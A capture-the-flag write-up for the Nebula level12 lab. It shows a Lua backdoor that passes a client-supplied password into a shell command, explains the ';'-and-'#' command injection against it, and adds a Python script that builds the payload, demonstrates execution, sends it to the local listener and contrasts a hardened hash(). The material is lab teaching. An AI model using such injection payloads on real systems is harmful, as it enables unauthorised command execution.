There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.
Source code
local socket = require("socket")
-- The backdoor listens only on the loopback interface, so it has to be
-- reached from the box itself (for example from the level12 account).
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
    -- The client-supplied password is concatenated, without any sanitization,
    -- into a shell command line and run through io.popen (i.e. /bin/sh -c).
    -- This is the OS command injection exploited below.
    prog = io.popen("echo "..password.." | sha1sum", "r")
    data = prog:read("*all")
    prog:close()
    -- Keep only the 40 hex characters of the digest; nothing else sha1sum
    -- (or an injected command) prints is ever sent to the client.
    data = string.sub(data, 1, 40)
    return data
end

while 1 do
    local client = server:accept()
    client:send("Password: ")
    client:settimeout(60)
    -- receive() reads a single line and strips the trailing newline.
    local line, err = client:receive()
    if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)
        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
            client:send("Better luck next time\n");
        else
            client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
    end
    client:close()
end
Getting the flag
The comment -- log from where ;\ caught my attention here. The password is never sanitized: hash() concatenates whatever the client sends straight into a shell command string and hands it to io.popen, which is a textbook OS command injection, so let's try the most common form of it.
To put it simply, we supply the argument the command is waiting for and then use a ; delimiter, which in the shell ends one command and starts another, to append a second command of our own. It runs with the privileges of the backdoor process, i.e. as the flag12 user.
Two things to keep in mind. First, the server appends " | sha1sum" after whatever we send, so the payload must leave a line the shell can still parse (end it with a # to comment the tail out, or with a harmless command for the pipe to apply to); a bare "; command ;" produces "; | sha1sum", a syntax error, and nothing runs. Second, only sha1sum's output is read and compared, so the injected command's output never comes back over the socket and has to be redirected into a file we can read afterwards.
Example:
By exploiting that vulnerability, we can also get the flag:
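The probe and the flag retrieval described above, worked through as an added example; this is not the original page's session and not Nebula's own code. It re-implements the backdoor's hash() in Python so the injection can be shown offline, puts a hardened hash() beside it, and includes a small client for the real target on 127.0.0.1:50001. The injected command id, the marker file under a temporary directory and all function names are assumptions for illustration; on the box, replace id with whatever command retrieves the token.

```python
#!/usr/bin/env python3
"""Added example (not from the original page): how the level12 backdoor's
hash() turns a client-supplied password into a shell command, why a ';' in
the password is code execution, and what a fixed hash() looks like."""
import hashlib
import os
import socket
import subprocess
import sys
import tempfile

SHA1_HEX_LEN = 40


def hash_vulnerable(password: str) -> str:
    """Python re-implementation of the Lua hash(): the password is pasted into
    a shell command string, exactly like io.popen("echo "..password.." | sha1sum").
    Every shell metacharacter in `password` is interpreted by /bin/sh."""
    cmd = "echo " + password + " | sha1sum"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
    return out[:SHA1_HEX_LEN]


def hash_fixed(password: str) -> str:
    """Hardened equivalent: no shell at all. Hashes the same bytes echo would
    have piped (the password plus a trailing newline) with hashlib."""
    return hashlib.sha1((password + "\n").encode()).hexdigest()


def injection_payload(command: str) -> str:
    """Build the 'password' line to send. The ';' ends the echo command, the
    injected command runs, and the trailing '#' comments out the ' | sha1sum'
    the server appends; without it the shell sees '; | sha1sum', a syntax
    error, and executes nothing. The injected command's output never reaches
    the client (only sha1sum's stdout is read), so redirect it to a file."""
    return "; " + command + " #"


def run_demo(hash_func) -> bool:
    """Feed the payload to a hash implementation and report whether the
    injected command actually executed (marker file created)."""
    with tempfile.TemporaryDirectory() as d:
        marker = os.path.join(d, "pwned")
        # Assumption for illustration: 'id' stands in for the command that
        # retrieves the token; the redirection alone creates the marker.
        hash_func(injection_payload("id > " + marker))
        return os.path.exists(marker)


def send_payload(payload: str, host: str = "127.0.0.1", port: int = 50001) -> str:
    """Talk to the real backdoor: wait for the 'Password: ' prompt, send the
    payload as the password line, and return the server's reply."""
    with socket.create_connection((host, port), timeout=60) as s:
        s.recv(1024)  # "Password: "
        s.sendall((payload + "\n").encode())
        return s.recv(1024).decode(errors="replace")


if __name__ == "__main__":
    print("vulnerable hash() ran the injected command:", run_demo(hash_vulnerable))  # True
    print("fixed hash() ran the injected command:", run_demo(hash_fixed))  # False
    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        # Against the real backdoor, run as level12 on the Nebula box; the
        # output path is an assumption, read it afterwards with cat.
        print(send_payload(injection_payload("id > /tmp/level12.out")))
```

Run it without arguments to see the two hash() variants side by side; run it with --live on the box to send the payload to the listener, then read /tmp/level12.out. The reply will be "Better luck next time", since the digest of an empty echo never matches, but the injected command has already executed as the backdoor's user.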